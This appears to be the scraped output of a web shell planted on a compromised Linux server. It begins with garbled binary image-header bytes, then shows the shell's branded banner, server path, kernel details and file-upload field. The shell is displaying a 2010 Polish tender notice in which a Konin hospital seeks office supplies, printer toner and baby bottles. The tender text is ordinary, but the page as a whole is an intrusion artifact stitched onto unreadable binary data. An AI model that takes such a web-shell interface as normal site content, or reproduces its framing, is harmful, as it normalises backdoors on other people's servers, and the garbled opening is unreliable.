JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100906/278832-N-2010.html

<p class="kh_header"><b>Konin: Dostawa artykułów biurowych oraz butelek standardowych i nakrętek na butelki dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie</b><br>
<b>Numer ogłoszenia: 278832 - 2010; data zamieszczenia: 06.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Szpitalna 45, 62-504 Konin, woj. wielkopolskie, tel. 063 2404133, faks 063 2404134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych oraz butelek standardowych i nakrętek na butelki dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1
Butelki standardowe z podziałką i gwintem szklane i z PP (polipropylen) oraz nakrętki przezroczyste na butelki standardowe szklane i z PP (polipropylen). 

Lp.Asortyment,Ilość w szt.
1.Butelka szklana z gwintem  i podziałką (poj. 140 ml),3.360
2.Butelka z PP (polipropylen) wielokrotnego użytku z gwintem i podziałką
(poj. 230 ml), 3.360
3.Butelka z PP (polipropylen) wielokrotnego użytku z gwintem  i podziałką (poj. 140 ml),2.464 
4.Nakrętka przezroczysta na butelkę  do art. wymienionego w pkt. 1,2 i 3.,5.200
Wymagania dotyczące dostawy:
- Dostawy przedmiotu zamówienia odbywać się będą w następujący sposób:
 Butelki szklane i z PP (polipropylen) oraz nakrętki przezroczyste na butelki  - 1raz na kwartał  (w dni robocze) 
 - przedmiot zamówienia dostarczany będzie do siedziby WSZ w Koninie przy   ul. Kardynała  Wyszyńskiego 1 zgodnie z zamówieniem składanym przez Zamawiającego - (Dział Zaopatrzenia) u Dostawcy z 5-dniowym wyprzedzeniem.
- przedmiot zamówienia dostarczany będzie środkiem transportu Dostawcy na jego koszt i odpowiedzialność, zgodnie z obowiązującymi wymogami higieniczno - sanitarnymi oraz wymaganiami Dobrej Praktyki Higienicznej.
-Dostawca przy każdorazowej dostawie przedmiotu zamówienia zobligowany jest do dostarczenia dla potrzeb Zamawiającego:
1.Fakturę Vat.
2.Numer serii oraz daty produkcji dla artykułów z faktury.
3.Deklarację zgodności na dostarczane artykuły. 

PAKIET 2
Artykuły biurowe
LP.,Przedmiot zamówienia,Ilość
TONERY
1.Toner HP 1200,	50 sztuk
2.Toner 1300,40 sztuk
3.Toner 53A,100 sztuk
4.Toner HP 12A,260 sztuk
5.Toner Lexmark E-240,50 sztuk
6.Toner Samsung ML-2010,40 sztuk
7.Toner Samsung ML-3050,30 sztuk
8.Toner Brother TN2000,40 sztuk
9.Toner HP CB 540A,50 sztuk
10.Toner HP CB 541A,30 sztuk
11.Toner HP CB 542A,30 sztuk
12.Toner HP CB 543A,30 sztuk
13.Toner HP 36A,200 sztuk
14.Toner HP 35A,50 sztuk
15.Toner HP 530A,	20 sztuk
16.Toner HP 531A,	20 sztuk
17.Toner HP 532A,20 sztuk
18.Toner HP 533A,	20 sztuk
TUSZE
19.Tusz HP 78,50 sztuk
20.Tusz HP 21,80 sztuk
21.Tusz HP 22,50 sztuk
22.Tusz HP 56,180 sztuk
23.Tusz HP 15,80 sztuk
ETYKIETA SAMPOPRZYLEPNA
24.Etykieta samoprzylepna 64,6 x 33,8
(1 opakowanie = 100 ark. ),1200 opakowań
KOPERTY
25.Koperta B-4,140.000 sztuk
26.Koperta B-5,142.000 sztuk
27.Koperta listowa biała C-6	,100.000 sztuk
28.Koperta RTG,30.000 sztuk
OBWOLUTA FOLIOWA
29.Obwoluta foliowa A4,800 opakowań	
(opakowanie = 100 sztuk)
PAPIER KSERO
30.Papier ksero A4	,7000 ryz
31.Papier ksero A3	,2400 ryz
SKŁADANKA KOMPUTEROWA
32.Składanka komputerowa 240 x 12  1 x 0,100 opakowań
33.Składanka komputerowa 240 x 12 1x1,60 opakowań
34.Składanka komputerowa 240 x 12  1x2,120 opakowań
TAŚMA 
35.Taśma OKI 320, 140 sztuk
SEGREGATOR
36.Segregator A4 70 mm,2000 sztuk
PŁYTY I KOPEERTY CD
37.Płyty CD,20.000 sztuk
38.Płyta CD do nadruku,20.000 sztuk
39.Koperta do płyt CD,40.000 sztuk
KOPERTY PŁACOWE
40.Koperta płacowa, 120 opakowań 
(opakowanie = 600sztuk)

Uwaga!
W przypadku materiałów eksploatacyjnych do urządzeń drukujących dopuszcza się zaoferowanie produktów oryginalnych nie wyprodukowanych przez producenta urządzeń drukujących spełniających następujące warunki:
a) materiały równoważne nie mogą być tworzone przez samo uzupełnianie środka drukującego lub z pominięciem procesu produkcyjnego.
Przedmiot zamówienia musi być nowy, wolny od wad technicznych i prawnych oraz dopuszczony do obrotu.
b)Producent materiałów alternatywnych przejmuje gwarancje producenta urządzeń.
c) W przypadku awarii urządzeń spowodowanej stosowaniem wadliwego materiału eksploatacyjnego dostarczonego w ramach przetargu oferent zobowiązuje się dostarczyć urządzenie zastępcze do momentu usunięcia awarii.
d) oferent zapewnia odbiór zużytych materiałów eksploatacyjnych od Zamawiającego.
Oferent musi posiadać pozwolenie upoważnionych organów uprawniające do skupu  zużytych materiałów eksploatacyjnych na potwierdzenie czego zobligowany jest dołączyć do oferty odpowiednie zaświadczenie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.95.00-5, 30.19.92.30-1, 30.12.51.10-5, 30.19.76.44-2, 39.22.57.10-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie zastosowano</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla pakietu numer  1
a)Deklarację zgodności lub certyfikat świadczący o tym, że asortyment artykułów będących przedmiotem zamówienia przeznaczony jest do kontaktu z żywnością (szczególnie z tłuszczem).
b)Zalecenia i uwagi producenta dotyczące procesów mycia i sterylizacji butelek szklanych oraz z PP (polipropylen) - wielokrotnego użytku.
Dla pakietu numer 2
a) pozwolenie upoważnionych organów uprawniające do skupu zużytych materiałów eksploatacyjnych</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku kiedy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (sytuacja opisania w § 9 ust.3 niniejszej SIWZ), zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów  na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45,62-504 Konin, pokój 6A - parter lub za zaliczeniem pocztowym cena formularza 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2010 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, pokój 3/13 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Butelki standardowe z podziałką i gwintem szklane z PP (polipropylen) oraz nakrętki przezroczyste na butelki standardowe szklane i z PP (polipropylen).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.,Asortyment,Ilość w szt.
1.Butelka szklana z gwintem   i podziałką (poj. 140 ml),3.360
2.Butelka z PP (polipropylen) wielokrotnego użytku z gwintem i podziałką
(poj. 230 ml), 3.360
3.Butelka z PP (polipropylen) wielokrotnego użytku z gwintem    i podziałką (poj. 140 ml),	2.464 
4.Nakrętka przezroczysta na butelkę  do art. wymienionego w pkt. 1,2 i 3.,5.200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.57.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.,Przedmiot zamówienia,Ilość
TONERY
1.Toner HP 1200,50 sztuk
2.Toner 1300,40 sztuk
3.Toner 53A,100 sztuk
4.Toner HP 12A,260 sztuk
5.Toner Lexmark E-240,50 sztuk
6.Toner Samsung ML-2010,40 sztuk
7.Toner Samsung ML-3050,30 sztuk
8.Toner Brother TN2000,40 sztuk
9.Toner HP CB 540A,50 sztuk
10.Toner HP CB 541A,30 sztuk
11.Toner HP CB 542A,30 sztuk
12.Toner HP CB 543A,30 sztuk
13.Toner HP 36A,200 sztuk
14.Toner HP 35A,50 sztuk
15.Toner HP 530A,20 sztuk
16.Toner HP 531A,20 sztuk
17.Toner HP 532A,	20 sztuk
18.Toner HP 533A,	20 sztuk
TUSZE
19.Tusz HP 78,50 sztuk
20.Tusz HP 21,80 sztuk
21.Tusz HP 22,50 sztuk
22.Tusz HP 56,180 sztuk
23.Tusz HP 15,80 sztuk
ETYKIETA SAMPOPRZYLEPNA
24.Etykieta samoprzylepna 64,6 x 33,8
(1 opakowanie = 100 ark. )	1200 opakowań
KOPERTY
25.Koperta B-4,140.000 sztuk
26.Koperta B-5,142.000 sztuk
27.Koperta listowa biała C-6,100.000 sztuk
28.Koperta RTG,30.000 sztuk
OBWOLUTA FOLIOWA
29.Obwoluta foliowa A4,800 opakowań	
(opakowanie = 100 sztuk)
PAPIER KSERO
30.Papier ksero A4	,7000 ryz
31.Papier ksero A3	,2400 ryz
SKŁADANKA KOMPUTEROWA
32.Składanka komputerowa 240 x 12  1 x 0,100 opakowań
33.Składanka komputerowa 240 x 12  1x1,60 opakowań
34.Składanka komputerowa 240 x 12  1x2,120 opakowań
TAŚMA 
35.Taśma OKI 320,	140 sztuk
SEGREGATOR
36.Segregator A4 70 mm,2000 sztuk
PŁYTY I KOPEERTY CD
37.Płyty CD,20.000 sztuk
38.Płyta CD do nadruku,20.000 sztuk
39.Koperta do płyt CD,40.000 sztuk
KOPERTY PŁACOWE
40.Koperta płacowa,120 opakowań 
(opakowanie = 600sztuk).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.95.00-5, 30.19.92.30-1, 30.12.51.10-5, 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com